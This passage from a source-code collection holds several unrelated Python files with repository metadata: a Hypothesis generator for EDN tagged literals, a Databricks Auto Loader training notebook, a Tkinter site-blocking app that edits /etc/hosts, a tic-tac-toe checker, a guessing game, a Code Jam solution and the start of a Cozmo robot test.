go over other parts of code to find\n # similar cases\n tag_item = draw(symbol_items())\n #\n # \"# followed immediately by a symbol starting with an alphabetic\n # character indicates that that symbol is a tag\"\n #\n # via: https://github.com/edn-format/edn#tagged-elements\n #\n tag_head = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\",\n \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\",\n \"u\", \"v\", \"w\", \"x\", \"y\", \"z\",\n \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\",\n \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\",\n \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\n tag_head_str = draw(sampled_from(tag_head))\n #\n tag_item[\"inputs\"] = tag_head_str + tag_item[\"inputs\"]\n #\n return tag_item\n\n@composite\ndef bare_tagged_literal_items(draw,\n separators=separator_strings(),\n label=label,\n verify=verify):\n #\n form_item = draw(form_items())\n #\n tag_item = draw(tag_items())\n #\n sep_strs = draw(lists(elements=separators,\n min_size=2, max_size=2))\n return {\"inputs\": form_item,\n \"label\": label,\n \"to_str\": build_tagged_literal_str,\n \"verify\": verify,\n \"tag\": tag_item,\n \"separators\": sep_strs,\n \"marker\": marker}\n\n@composite\ndef tagged_literal_with_metadata_items(draw,\n separators=separator_strings(),\n metadata=\"metadata\",\n label=label,\n verify=verify_with_metadata):\n # avoid circular dependency\n from .metadata import metadata_items, check_metadata_flavor\n #\n check_metadata_flavor(metadata)\n #\n tl_item = draw(bare_tagged_literal_items(separators=separators,\n label=label,\n verify=verify))\n #\n str_builder = \\\n make_form_with_metadata_str_builder(build_tagged_literal_str)\n #\n n = draw(integers(min_value=1, max_value=metadata_max))\n #\n md_items = draw(lists(elements=metadata_items(flavor=metadata),\n min_size=n, max_size=n))\n #\n tl_item.update({\"to_str\": str_builder,\n \"metadata\": md_items})\n #\n return tl_item\n\n@composite\ndef tagged_literal_items(draw,\n separators=separator_strings(),\n metadata=False,\n label=label,\n verify=verify):\n if not metadata:\n return draw(bare_tagged_literal_items(separators=separators,\n label=label,\n verify=verify))\n else:\n return \\\n draw(tagged_literal_with_metadata_items(separators=separators,\n metadata=metadata,\n label=label,\n verify=verify))\n","repo_name":"sogaiu/hypothesis-grammar-clojure","sub_path":"hypothesis_grammar_clojure/tagged_literals.py","file_name":"tagged_literals.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9272641352","text":"# Databricks notebook source\n# MAGIC %md-sandbox\n# MAGIC\n# MAGIC
      \n# MAGIC \"Databricks\n# MAGIC
      \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Auto Load Data to Multiplex Bronze\n# MAGIC\n# MAGIC Rather than connecting to Kafka directly, the chief architect has decided that source systems will deliver raw records as JSON files to cloud object storage. In this notebook, you'll ingest these records with Auto Loader and build a multiplex table that stores the entire history of this incremental feed. The initial table stores data from all of the topics and has the following schema.\n# MAGIC\n# MAGIC | Field | Type |\n# MAGIC | --- | --- |\n# MAGIC | key | BINARY |\n# MAGIC | value | BINARY |\n# MAGIC | topic | STRING |\n# MAGIC | partition | LONG |\n# MAGIC | offset | LONG |\n# MAGIC | timestamp | LONG |\n# MAGIC | date | DATE |\n# MAGIC | week_part | STRING |\n# MAGIC\n# MAGIC This single table drives the majority of the data through the target architecture, feeding three interdependent data pipelines.\n# MAGIC\n# MAGIC \n# MAGIC\n# MAGIC **NOTE**: Details on additional configurations for connecting to Kafka are available here.\n# MAGIC\n# MAGIC\n# MAGIC ## By the end of this lesson, you should be able to:\n# MAGIC - Describe a multiplex design\n# MAGIC - Apply Auto Loader to process records incrementally\n# MAGIC - Configure trigger intervals\n# MAGIC - Use \"trigger-available-now\" logic to perform triggered incremental loading of data\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The following cell declares the paths needed throughout this notebook.\n\n# COMMAND ----------\n\n# MAGIC %run ../Includes/Classroom-Setup-3.1\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC For the examples in this training, all records are stored under the DBFS root.\n# MAGIC\n# MAGIC In both development and production environments, it is preferable to configure separate databases and storage accounts for each layer of data.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Examine the Source Data\n# MAGIC\n# MAGIC Data files are written to the path specified by the variable below.\n# MAGIC\n# MAGIC Run the cell below to examine the schema of the source data and decide whether any changes are needed as it is ingested.\n\n# COMMAND ----------\n\nspark.read.json(DA.paths.source_daily).printSchema()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Prepare Data to Join with the Date Lookup Table\n# MAGIC The setup script loaded a **`date_lookup`** table. This table contains a number of pre-computed date values. Note that additional fields indicating holidays or fiscal quarters are often added to this table later to further enrich the data.\n# MAGIC\n# MAGIC Pre-computing and storing these values is especially important if you wish to partition your data by year and week using the string pattern **`YYYY-WW`**. While Spark has both **`year`** and **`weekofyear`** functions built in, the \n# MAGIC **`weekofyear`** function may not provide the expected behavior for dates in the last week of December or the first week of January, as it defines week 1 as the first week with more than 3 days.\n# MAGIC\n# MAGIC While this edge case is esoteric to Spark, a **`date_lookup`** table used across an organization is important for making sure that data is consistently enriched with date-related details.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC\n# MAGIC DESCRIBE date_lookup\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC select * from date_lookup\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The table as currently implemented needs to be able to return the correct **`week_part`** for each **`date`**.\n# MAGIC\n# MAGIC The call below creates the **`DataFrame`** needed for the subsequent join operation.\n\n# COMMAND ----------\n\ndate_lookup_df = spark.table(\"date_lookup\").select(\"date\", \"week_part\")\n\n# COMMAND ----------\n\ndisplay(date_lookup_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Working with the JSON data stored in **`DA.paths.source_daily`**, transform the **`timestamp`** column as necessary and join it against the **`date`** column.\n\n# COMMAND ----------\n\njson_df = spark.read.json(DA.paths.source_daily)\ndisplay(json_df)\n\n# COMMAND ----------\n\n# TODO\nfrom pyspark.sql import functions as F\njson_df = spark.read.json(DA.paths.source_daily)\n \njoined_df = (json_df.join(F.broadcast(date_lookup_df),\n                          F.to_date((F.col(\"timestamp\")/1000).cast(\"timestamp\")) == F.col(\"date\"),\n                          \"left\"))\n \ndisplay(joined_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Define a Triggered Incremental Auto Load to the Multiplex Bronze Table\n# MAGIC\n# MAGIC Below is starter code for a function that incrementally processes data from the source directory to the bronze table, creating the table on the first write.\n# MAGIC\n# MAGIC The missing pieces are listed below:\n# MAGIC - Configure the stream to use Auto Loader\n# MAGIC - Configure Auto Loader 
to use the JSON format\n# MAGIC - Perform a broadcast join with the date_lookup table\n# MAGIC - Partition the data by the **`topic`** and **`week_part`** fields\n\n# COMMAND ----------\n\n# TODO\ndef process_bronze():\n    query = (spark.readStream\n                  .format(\"cloudFiles\")\n                  .option(\"cloudFiles.format\", \"json\")\n                  .option(\"cloudFiles.schemaLocation\", f\"{DA.paths.checkpoints}/bronze_schema\")\n                  .load(DA.paths.source_daily)\n                  .join(F.broadcast(date_lookup_df), F.to_date((F.col(\"timestamp\")/1000).cast(\"timestamp\")) == F.col(\"date\"), \"left\")\n                  .writeStream\n                  .option(\"checkpointLocation\", f\"{DA.paths.checkpoints}/bronze\")\n                  .partitionBy(\"topic\", \"week_part\")\n                  .trigger(availableNow=True)\n                  .table(\"bronze\"))\n    \n    query.awaitTermination()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Run the cell below to process an incremental batch of data.\n\n# COMMAND ----------\n\nprocess_bronze()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Check the number of records processed.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT COUNT(*) FROM bronze\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Preview the data to make sure records are being ingested correctly.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM bronze\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The **`DA.daily_stream.load()`** code below is a helper class that lands new data in the source directory.\n# MAGIC\n# MAGIC Running the cell below should allow a new batch to be processed successfully.\n\n# COMMAND ----------\n\nDA.daily_stream.load()\n\n# COMMAND ----------\n\nprocess_bronze()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Confirm the count is now higher.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT COUNT(*) FROM bronze\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Run the following cell to delete the tables and files associated with this lesson.\n\n# COMMAND ----------\n\nDA.cleanup()\n\n# COMMAND ----------\n\n# MAGIC %md-sandbox\n# MAGIC © 2022 Databricks, Inc. All rights reserved.
      \n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.
      \n# MAGIC
      \n# MAGIC Privacy Policy | Terms of Use | Support\n","repo_name":"skotani-db/partner-elevate","sub_path":"Advanced-Data-Engineering-with-Databricks-JA/02 - Bronze Ingestion Patterns/ADE 2.1 - Auto Load to Multiplex Bronze.py","file_name":"ADE 2.1 - Auto Load to Multiplex Bronze.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"11318009807","text":"try:\n import tkinter\nexcept:\n import Tkinter as tkinter\nimport pathlib\nimport time\ntry:\n from tkinter import messagebox\nexcept:\n import tkMessageBox\nimport shutil\nimport subprocess\nimport sys\nimport os.path\n\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\n\nclass FocusApp:\n \"\"\"\n Class that stores the entire focus app\n \"\"\"\n def __init__(self):\n \"\"\"Initialises all the required variables\"\"\"\n self.rootWidth = 500\n self.rootHeight = 150\n self.sliderWidth = 400\n self.sliderHeight = 70\n self.buttonWidth = 50\n self.buttonHeight = 20\n self.timerBeingDisplayed = False\n\n # Start building the GUI here\n self.parentWindow = tkinter.Tk()\n self.parentWindow.title(\"FocusApp\")\n self.parentWindow.geometry(str(self.rootWidth) + \"x\" + str(self.rootHeight))\n # Attach the logo here\n self.img = tkinter.PhotoImage(file=resource_path('favicon.gif'))\n self.parentWindow.tk.call('wm', 'iconphoto', self.parentWindow._w, self.img)\n \n \n def __clearParentWindowCanvas__(self):\n \"\"\"Method deletes all the child elements of the parentWindow node\"\"\"\n for child in self.parentWindow.winfo_children():\n try:\n child.destroy()\n except:\n pass\n # child.destroy()\n \n def __generateParentWindow__(self):\n \"\"\"Creates the root window\"\"\"\n self.__clearParentWindowCanvas__()\n self.__generateSlider__()\n self.__generateStartButton__()\n self.__generateViewButton__()\n # Check if /etc/.hosts.backup already exists. If it does, then copy it back to /etc/hosts. 
Otherwise, do nothing\n    \n    \n    def __generateSlider__(self):\n        \"\"\"Creates the slider present on the root window that enables time to be selected\"\"\"\n        self.sliderLabel = tkinter.Label(self.parentWindow, text=\"Time (in hours)\")\n        # self.sliderLabel.place(x = (self.rootWidth - self.sliderWidth)/2, y = 10, width=self.sliderWidth, height=self.sliderHeight)\n        self.sliderLabel.pack()\n        self.slider = tkinter.Scale(self.parentWindow, from_=0.5, to=24, length=self.sliderWidth, resolution=0.5, orient=\"horizontal\")\n        # self.slider.grid(row=5, column=10)\n        self.slider.set(0.5)\n        # self.slider.pack()\n        self.slider.place(x = (self.rootWidth - self.sliderWidth)/2, y = 20, width=self.sliderWidth, height=self.sliderHeight)\n\n    def __generateStartButton__(self):\n        \"\"\"Creates the start button on the root window that will start the block\"\"\"\n        self.startButton = tkinter.Button(self.parentWindow, text =\"Start\", command = self.startButtonAction)\n        # .grid(row=7, column=10)\n\n        # self.startButton.pack(side=\"left\")\n        self.startButton.place(x = (self.rootWidth - self.buttonWidth)/2 - 2 * self.buttonWidth, y = self.sliderHeight + self.buttonHeight, width=self.buttonWidth, height=self.buttonHeight)\n\n    def __generateViewButton__(self):\n        \"\"\"Creates the view button on the root window that will display a sub-window that lists all the blocked sites\"\"\"\n        self.viewButton = tkinter.Button(self.parentWindow, text =\"View\", command = self.viewButtonAction)\n        # .grid(row=7, column=18)\n        # self.viewButton.pack(side=\"right\")\n        self.viewButton.place(x = (self.rootWidth - self.buttonWidth)/2 + 2 * self.buttonWidth, y = self.sliderHeight + self.buttonHeight, width=self.buttonWidth, height=self.buttonHeight)\n\n    def __generateEntryWidget__(self):\n        \"\"\"Creates the entry widget in the view-list window\"\"\"\n        self.entry = tkinter.Entry(self.viewListWindow)\n        self.entry.pack()\n    \n    def __generateAddButton__(self):\n        \"\"\"Creates the add button in the view-list window\"\"\"\n        self.addButton = tkinter.Button(self.viewListWindow, text =\"Add\", command = self.addButtonAction)\n        # .grid(row=7, column=10)\n\n        # b.pack(side=\"left\")\n        # self.addButton.place(x = (rootWidth - buttonWidth)/2 - 2 * buttonWidth, y = sliderHeight + buttonHeight, width=buttonWidth, height=buttonHeight)\n        self.addButton.pack()\n        self.viewListWindow.bind(\"<Return>\", self.__handleEnter__)\n    \n    def __handleEnter__(self, event):\n        \"\"\"This method is called when the RETURN key is pressed on the viewListWindow\"\"\"\n        self.addButtonAction()\n\n    def __generateListBox__(self):\n        \"\"\"Creates the listbox widget in the view-list window\"\"\"\n        self.listBox = tkinter.Listbox(self.viewListWindow)\n        self.__displayAllDomainsInListBox__()\n        self.listBox.pack()\n    \n    def __generateListBoxContextMenu__(self):\n        \"\"\"Creates the context menu for the listbox in the view-list window\"\"\"\n        # Add a context menu here\n        # create a popup menu\n        self.listboxContextMenu = tkinter.Menu(self.viewListWindow, tearoff=0)\n        self.listboxContextMenu.add_command(label=\"Delete\", command=self.deleteMenuAction)\n\n        # create a canvas\n        frame = tkinter.Frame(self.viewListWindow, width=512, height=512)\n        frame.pack()\n\n        def popup(event):\n            # Check if a selection has been made; if not, don't display the menu\n            if event.widget.curselection() == ():\n                return\n            # Otherwise, display the menu\n            self.listboxContextMenu.tk_popup(event.x_root, event.y_root)\n        # attach popup to the listbox (right-click)\n        self.listBox.bind(\"<Button-3>\", popup)\n    \n    def __generateViewSitesFrame__(self):\n        \"\"\"Creates the sub-window that lists all the 
blocked sites\"\"\"\n self.viewListWindow = tkinter.Toplevel()\n self.viewListWindow.title(\"FocusApp - Sites list\")\n self.viewListWindow.geometry(str(self.rootWidth) + \"x\" + str(self.rootHeight))\n self.viewListWindow.tk.call('wm', 'iconphoto', self.viewListWindow._w, self.img)\n\n self.__generateEntryWidget__()\n self.__generateAddButton__()\n self.__generateListBox__()\n self.__generateListBoxContextMenu__()\n \n def __generateTimerWindow__(self):\n \"\"\"Creates a timer window that displays the time left before sites would be automatically unblocked\"\"\"\n self.__clearParentWindowCanvas__()\n\n # Add a label here\n self.timerWindowLabel = tkinter.Label(self.parentWindow, text=\"Hey\")\n self.timerWindowLabel.pack()\n # self.timerWindow.mainloop()\n \n def __displayAllDomainsInListBox__(self):\n \"\"\"Parses through the .domains.list file and loads all the domains into the listbox\"\"\"\n # Delete all the elements\n self.listBox.delete(0, tkinter.END)\n # Open the .domains.list file here and populate the entries\n if not pathlib.Path(resource_path(\".domains.list\")).is_file():\n # Create an .domains.list file here\n open(resource_path(\".domains.list\"), \"w\").close()\n # .domains.list exists here\n domainsFile = open(resource_path(\".domains.list\"), \"r\")\n domainsList = domainsFile.read().split(\"\\n\")\n i = 1\n for domain in domainsList:\n self.listBox.insert(i, domain)\n i += 1\n domainsFile.close()\n \n def __writeToHosts__(self):\n \"\"\"Method reads the .domains.list file and writes to /etc/hosts\"\"\"\n domainsList = open(resource_path(\".domains.list\"), \"r\").read().split(\"\\n\")\n hostsFile = \"\"\n for domain in domainsList:\n if domain == \"\":\n continue\n hostsFile += \"127.0.0.1 \" + domain + \"\\n\"\n hostsFile += \"::1 \" + domain + \"\\n\\n\"\n # print(\"Hosts file has become: \\n\\n\", hostsFile)\n # Read from \"/etc/.hosts.backup\"\n existingDNS = open(\"/etc/.hosts.backup\", \"r\").read()\n f = open(\"/etc/hosts\", \"w\")\n f.write(existingDNS)\n f.write(\"\\n\\n\")\n f.write(hostsFile)\n f.close()\n \n def start(self):\n \"\"\"Starts the GUI\"\"\"\n # Read the .stats file. \n if not pathlib.Path(resource_path(\".stats\")).is_file():\n # If no .stats file is present, start the mainloop.\n # print(\".stats file is not present\")\n self.__generateParentWindow__()\n else:\n # .stats file is present.\n # print(\"*****.stats file is present*****\")\n # Read the endtime\n endTime = 0\n try:\n endTime = int(open(resource_path(\".stats\"), \"r\").read())\n # print(\"End Time is \", endTime)\n except:\n endTime = 0\n # print(\"While fetching end time, error occurred, hence, setting end time to \", endTime)\n currentTime = time.time()\n if currentTime > endTime:\n # If cur_time > endtime, start the mainloop.\n # print(\"Current time is greater than endtime. 
Starting mainloop.\")\n self.__generateParentWindow__()\n else:\n # Otherwise, display a box with remaining time.\n # print(\"Sites are still blocked.\")\n self.initTimer(endTime - currentTime)\n self.parentWindow.mainloop()\n\n def initTimer(self, timeLeft):\n self.timeLeft = int(timeLeft)\n \"\"\"Method initialises a timer\"\"\"\n # Create a timer window here\n self.__generateTimerWindow__()\n self.startTimer()\n \n def startTimer(self):\n \"\"\"Method starts the timer\"\"\"\n if self.timeLeft == 0:\n # Delete contents from .stats\n open(resource_path(\".stats\"), \"w\").close()\n self.__clearParentWindowCanvas__()\n # Copy back /etc/.hosts.backup to /etc/hosts\n try:\n \n shutil.copy2(\"/etc/.hosts.backup\", \"/etc/hosts\")\n except Exception as e:\n # print(\"While copying /etc/.hosts.backup to /etc/hosts, error is \", e)\n pass\n reloadDNS()\n self.start()\n else:\n self.timeLeft -= 1\n self.timerWindowLabel.config(text=str(self.timeLeft))\n self.timerWindowLabel.after(1000, self.startTimer)\n \n def startButtonAction(self):\n \"\"\"Called when the start button is pressed\"\"\"\n # Ask for sudo permission\n # try:\n # subprocess.check_call([\"gksudo\", \"su\"])\n # except subprocess.CalledProcessError:\n # messagebox.showinfo(\"message\", \"OOOOPS...\\nWrong password!\")\n # return\n # else:\n # messagebox.showinfo(\"message\", \"Login successful!\")\n\n\n\n # Fetch the time in the slider\n timerVal = self.slider.get()\n # print(\"Timer value is \", timerVal)\n # Read all the sites in .domains.list. \n if not pathlib.Path(resource_path(\".domains.list\")).is_file():\n # Create an .domains.list file here\n open(resource_path(\".domains.list\"), \"w\").close()\n # Read all domains\n domainsFile = open(resource_path(\".domains.list\"), \"r\").read()\n if domainsFile == \"\":\n # If no .domains.list file is present, display a messagebox stating so.\n messagebox.showerror(\"FocusApp Error\", \"No domains added yet. Add them by clicking the View button.\")\n return\n \n # Make a backup of /etc/hosts to /etc/.hosts.backup\n try:\n open(\"/etc/.hosts.backup\", \"w\").close()\n shutil.copy2(\"/etc/hosts\", \"/etc/.hosts.backup\")\n except Exception as e:\n # print(\"While copying /etc/hosts to /etc/.hosts.backup, error is \", e)\n pass\n \n self.__writeToHosts__()\n\n reloadDNS()\n\n # Create a .stats file, with endtime\n curTime = int(time.time())\n endTime = curTime + int(timerVal * 3600)\n f = open(resource_path(\".stats\"), \"w\")\n f.write(str(endTime))\n f.close()\n # Call initTimer here\n self.initTimer(endTime - curTime)\n \n\n def viewButtonAction(self):\n \"\"\"Called when the view button is pressed. Will generate another window that will list all the sites that need to be blocked.\"\"\"\n self.__generateViewSitesFrame__()\n \n def addButtonAction(self):\n \"\"\"Called when the add button is clicked. 
This will add the value entered in the text field to the domains list.\"\"\"\n        # Get the value in the entry widget\n        domain = self.entry.get()\n        if domain == \"\":\n            return\n        # Clear the value in the entry widget\n        self.entry.delete(0, tkinter.END)\n        if not pathlib.Path(resource_path(\".domains.list\")).is_file():\n            # Create an .domains.list file here\n            open(resource_path(\".domains.list\"), \"w\").close()\n        # Read all domains\n        domainsList = open(resource_path(\".domains.list\"), \"r\").read().split(\"\\n\")\n        # Prepend to the list\n        domainsList.insert(0, domain)\n        # Write to the file\n        domainsFile = open(resource_path(\".domains.list\"), \"w\")\n        domainsFile.write(\"\\n\".join(domainsList))\n        domainsFile.close()\n        self.__displayAllDomainsInListBox__()\n\n    def deleteMenuAction(self):\n        \"\"\"Called when the delete context menu is clicked\"\"\"\n        value = self.listBox.get(self.listBox.curselection()[0])\n        if value == \"\":\n            return\n        # Read the file and store all the elements in a list\n        domainsList = open(resource_path(\".domains.list\"), \"r\").read().split(\"\\n\")\n        domainsList.remove(value)\n        domainsFile = open(resource_path(\".domains.list\"), \"w\")\n        domainsFile.write(\"\\n\".join(domainsList))\n        domainsFile.close()\n        self.__displayAllDomainsInListBox__()\n\n\ndef reloadDNS():\n    \"\"\"Function that reloads the /etc/hosts file\"\"\"\n    return\n\n\"\"\"\nTODO\n5. Use grid to restyle the app.\n9. Check how to ask for permission for sudo usage.\n11. Make the code portable to work on windows as well.\n12. Set after() time to 1000, from 1.\n\"\"\"","repo_name":"apratheek/FocusApp","sub_path":"focusapp.py","file_name":"focusapp.py","file_ext":"py","file_size_in_byte":14230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19462829536","text":"\"\"\"/*\n* Challenge #18\n* TIC-TAC-TOE (TRES EN RAYA)\n* Statement published: 02/05/22\n* Solution published: 09/05/22\n* Difficulty: HARD\n*\n* Statement: Create a function that analyzes a 3x3 matrix made up of \"X\" and \"O\" and returns the following:\n* - \"X\" if the \"X\"s have won\n* - \"O\" if the \"O\"s have won\n* - \"Empate\" if there has been a draw\n* - \"Nulo\" if the proportion of \"X\", of \"O\", or of the matrix is not correct, or if both have won.\n* Note: The matrix may not be fully covered. 
It could be represented with an empty \"\", for example.\n*\n* Additional information:\n* - Use the \"🔁reto-semanal\" channel on our discord (https://mouredev.com/discord) for questions, doubts, or to lend a hand to the community.\n* - You can fork the repo and open a Pull Request against the original repo so we can see your contributed solution.\n* - I will review the exercise live on Twitch on the Monday following its publication.\n* - I will upload a possible solution to the exercise on the Monday following its publication.\n*\n*/\"\"\"\n\nfrom enum import Enum\n\nclass Value(Enum):\n    X = 'X'\n    O = 'O'\n    EMPTY = ''\nclass Triqui:\n    combinations = [[1,2,3],[4,5,6],[7,8,9],[1,4,7],[2,5,8],[3,6,9],[1,5,9],[3,5,7]]\n    def __init__(self,grid):\n        self.grid = grid\n    def check_triqui(self):\n        result = 'Draw'\n        play_x = []\n        play_o = []\n        x_count = 0\n        o_count = 0\n        if len(self.grid) != 3 :\n            return \"Nulo\"\n        else:\n            b = 1\n            for row in self.grid:\n                if len(row) != 3 :\n                    return \"Nulo\"\n                for box in row :\n                    if box == Value.X :\n                        play_x.append(b)\n                        x_count += 1\n                    elif box == Value.O :\n                        play_o.append(b)\n                        o_count += 1\n                    b += 1\n        if abs(x_count - o_count) > 1:\n            return \"Nulo\"\n        for win in self.combinations:\n            if len(set(win) & set(play_o)) == 3:\n                if result == 'Draw' :\n                    result = Value.O.value\n                else:\n                    return 'Nulo'\n            elif len(set(win) & set(play_x)) == 3:\n                if result == 'Draw':\n                    result = Value.X.value\n                else :\n                    return \"Nulo\"\n        return result if result == 'Draw' else f'Win {result}'\n    \nif __name__ == \"__main__\":\n    grid_1 = [[Value.X, Value.O, Value.X],[Value.O, Value.X, Value.O],[Value.O, Value.O, Value.X]]\n    grid_2 = [[Value.EMPTY, Value.O, Value.X],[Value.EMPTY, Value.X, Value.O],[Value.EMPTY, Value.O, Value.X]]\n    grid_3 = [[Value.O, Value.O, Value.EMPTY],[Value.O, Value.X, Value.X],[Value.O, Value.X, Value.X]]\n    grid_4 = [[Value.X, Value.O, Value.X],[Value.X, Value.X, Value.O],[Value.X, Value.X, Value.X]]\n    triqui_1 = Triqui(grid_1)\n    triqui_2 = Triqui(grid_2)\n    triqui_3 = Triqui(grid_3)\n    triqui_4 = Triqui(grid_4)\n    print(triqui_1.check_triqui()) \n    print(triqui_2.check_triqui())\n    print(triqui_3.check_triqui())\n    print(triqui_4.check_triqui()) \n","repo_name":"JulianD1997/Retos-de-programacion","sub_path":"reto18.py","file_name":"reto18.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5411076536","text":"\"\"\"\r\nGuessing Game\r\nDescription: This program is a simple guessing game with three different difficulties\r\nAuthor: Pedro Torres\r\n\"\"\"\r\nfrom random import *\r\n\r\n# Guessing Game 2.0\r\n\r\n# Makes sure that the user enters a valid difficulty\r\noptions = [\"Easy\", \"Medium\", \"Hard\"]\r\nwhile True:\r\n    game_difficulty = input(\"Select a difficulty [Easy][Medium][Hard]: \")\r\n    print(\"\")\r\n    game_difficulty = game_difficulty.capitalize()\r\n\r\n    if game_difficulty in options:\r\n        break\r\n    else:\r\n        # These are the exceptions\r\n        if game_difficulty.isdigit():\r\n            print(\"Enter a word not a number.\")\r\n            print(\"\")\r\n        else:\r\n            print(\"Sorry, but that is not a valid difficulty.\")\r\n            print(\"\")\r\n\r\nguesses = 0\r\nrandom_number = 0\r\nguessing_range = 0\r\nif game_difficulty == \"Easy\":\r\n    guessing_range = 100\r\n    guesses = 15\r\n    random_number = randint(1, guessing_range)\r\nelif game_difficulty == \"Medium\":\r\n    guessing_range = 300\r\n    guesses = 10\r\n    random_number = randint(1, guessing_range)\r\nelif game_difficulty == \"Hard\":\r\n    guessing_range = 500\r\n    guesses = 
5\r\n random_number = randint(1, guessing_range)\r\n\r\nprint(\"You have chosen \" + game_difficulty + \" mode.\")\r\nprint(str(guesses) + \" guesses\" + \".\")\r\nprint(\"The random number lies between 1 and \" + str(guessing_range) + \".\")\r\nprint(\"\\n\")\r\n\r\n# Starts the game\r\ni = guesses\r\nwhile i > 0:\r\n while True:\r\n try:\r\n print(\"\")\r\n guess = int(input(\"Take your shot: \"))\r\n break\r\n except ValueError:\r\n print(\"That input is invalid! Try something else.\")\r\n if guess == random_number:\r\n print(\"You won!\")\r\n break\r\n elif guess > guessing_range or guess < 0:\r\n print(\"You guess is out of range!\")\r\n\r\n elif guess < random_number:\r\n i = i - 1\r\n print(\"You have guessed too low.\")\r\n\r\n elif guess > random_number:\r\n i = i - 1\r\n print(\"You have guessed too high.\")\r\n\r\n print(str(i) + \" guesses left.\")\r\n\r\nif i > 0:\r\n print(\"You won!\")\r\nelse:\r\n print(\"Wow, I guess you lost. Try again.\")\r\n","repo_name":"pedrot123/HS-Comp-Sci-Projects","sub_path":"Intro to Comp Sci/Guessing Game.py","file_name":"Guessing Game.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23412144961","text":"__author__ = 'Bill'\r\n\r\nimport sys, time\r\n\r\ndef parse_case(file):\r\n a1 = int(file.readline()) - 1\r\n cards1 = []\r\n for i in range(4):\r\n cards1.append( map(int, file.readline().split()) )\r\n a2 = int(file.readline()) - 1\r\n cards2 = []\r\n for i in range(4):\r\n cards2.append( map(int, file.readline().split()) )\r\n\r\n return a1, cards1, a2, cards2\r\n\r\ndef process_case(case):\r\n a1, cards1, a2, cards2 = case\r\n #print(cards1[a1], cards2[a2])\r\n\r\n result_set = set(cards1[a1]) & set(cards2[a2])\r\n if len(result_set) == 1:\r\n result = result_set.pop()\r\n elif len(result_set) > 1:\r\n result = 'Bad magician!'\r\n else:\r\n result = 'Volunteer cheated!'\r\n\r\n return result\r\n\r\nif __name__ == '__main__':\r\n t0 = time.clock()\r\n\r\n if len(sys.argv) > 1:\r\n filename = sys.argv[1]\r\n else:\r\n filename = \"sample.in\"\r\n\r\n input_file = open(filename, \"r\")\r\n output_file = open(filename.replace('in','out'), \"w\")\r\n case_count = int(input_file.readline())\r\n for i in range(case_count):\r\n result = process_case(parse_case(input_file))\r\n output_line = 'Case #%d: %s\\n' % (i+1, result)\r\n print(output_line)\r\n output_file.writelines(output_line)\r\n\r\n input_file.close()\r\n output_file.close()\r\n\r\n print('Total Time: %s' % str(time.clock() - t0))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1896.py","file_name":"1896.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42598274068","text":"#!/usr/bin/python3\n\n\nimport cozmo\n\nfrom chifoumi import RoundResult\nimport robotchifoumi\nfrom robotchifoumi import RobotChifoumi\n\n\ndef testGameEnd(r: cozmo.robot.Robot):\n robot = RobotChifoumi(r)\n\n robot.react_to_game_end(5, 3)\n robot.react_to_game_end(0, 3)\n robot.react_to_game_end(1, 3)\n robot.react_to_game_end(2, 3)\n robot.react_to_game_end(3, 0)\n robot.react_to_game_end(3, 2)\n\ndef testRoundEnd(r: cozmo.robot.Robot):\n robot = RobotChifoumi(r)\n\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n 
